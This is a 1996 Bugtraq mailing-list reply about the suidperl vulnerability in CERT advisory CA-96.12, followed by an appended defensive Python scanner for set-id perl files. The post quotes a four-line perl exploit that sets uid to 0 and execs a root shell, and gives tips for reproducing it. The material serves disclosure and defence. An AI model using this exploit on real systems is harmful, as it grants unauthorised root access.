Bugtraq mailing list archives
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
From: rob () brasaap iaehv nl (Rob J. Nauta)
Date: Sun, 30 Jun 1996 11:54:01 +0200
On Fri, 28 Jun 1996 ichudov () algebra com wrote:

What is the exploit?

Run this as a suid or sgid script. It doesn't matter what user or group it's suid/sgid to...it gets root access.

#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");

I think it's not entirely correct. I was able to reproduce the bug
with #!/usr/bin/suidperl -U as the first line. You need the -U or else
suidperl will complain about an insecure function being used. I also
used system("/usr/bin/id"); which is more obvious to verify whether the
bug exists.
Is it just me...or does it give people the willies knowing such an easy to exploit hole was on their systems...perhaps for years.
Certainly! I mean, I first heard about this via the CERT advisory while
I am on most security lists. I guess via the PERL newsgroups/mailing
lists there was an earlier alert, which the bad guys could've gotten,
a bad one for all security folks! Nothing on bugtraq or the -alert
lists, I guess many sites could have gotten hacked by people reading
PERL news. This just shows 1) CERT alerts aren't that bad, by reading
it I reproduced an exploit in minutes 2) security lists aren't everything,
don't rely on them too much 3) the usenet security newsgroups are just
entertainment and have no useful purpose for discussing new bugs, just
general 'what is a firewall?' questions 4) bugtraq doesn't really meet
its 'full disclosure' charter, nobody who knew the bug bothered to send
in an exploit.
I checked an internet provider and they had a new suidperl with a date
of June 2nd which was a safe one. I guess they have better sources than
me, which is always a disappointment.
Rob
--
/; ;\
__ \\____// From the keyboard of
/{_\_/ \`'\_/__ Rob J. Nauta
\;/ \___ (o\ /o } rob () nauta it
__//_______________________/ :--' rjn () pobox com
/ //######## #### \_ `__\
// ###### #### #### \___(o'o)
=/ ### ####### ### `===='
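
An added example, not part of the original post: a defender-side audit that walks a directory tree and reports set-id files that are perl scripts (noting a -U switch on the interpreter line, as in the reproduction above) or set-id perl interpreter binaries. The interpreter names it matches (perl, suidperl, sperl plus a version suffix) and the default scan root are assumptions of this example.

```python
import os
import re
import stat
import sys

# Interpreter basenames treated as perl (assumption of this example).
PERL_NAME = re.compile(r"^(suid|s)?perl[\d.]*$")
SETID = stat.S_ISUID | stat.S_ISGID


def classify(name, mode, first_line):
    """Return a finding for a set-id perl script or interpreter, else None."""
    if not stat.S_ISREG(mode) or not mode & SETID:
        return None
    flags = (("suid", stat.S_ISUID), ("sgid", stat.S_ISGID))
    bits = "+".join(label for label, bit in flags if mode & bit)
    if first_line.startswith("#!"):
        parts = first_line[2:].split()
        if parts and PERL_NAME.match(os.path.basename(parts[0])):
            # Heuristic: a switch cluster containing U, such as -U or -wU.
            unsafe = any(re.match(r"^-\w*U", arg) for arg in parts[1:])
            note = " with -U (unsafe operations allowed)" if unsafe else ""
            return f"{bits} perl script{note}"
        return None
    if PERL_NAME.match(name):
        return f"{bits} perl interpreter binary"
    return None


def scan(root):
    """Walk root and return (path, finding) pairs for set-id perl files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
                if not stat.S_ISREG(mode) or not mode & SETID:
                    continue  # only open files that carry a set-id bit
                with open(path, "rb") as fh:
                    first = fh.readline(256).decode("latin-1").strip()
            except OSError:
                continue  # unreadable or vanished file: skip it
            finding = classify(name, mode, first)
            if finding:
                findings.append((path, finding))
    return findings


if __name__ == "__main__":
    for path, finding in scan(sys.argv[1] if len(sys.argv) > 1 else "/usr"):
        print(f"{path}: {finding}")
```

Any interpreter binary it reports still has to be checked against the vendor's fixed build; the scan only locates candidates.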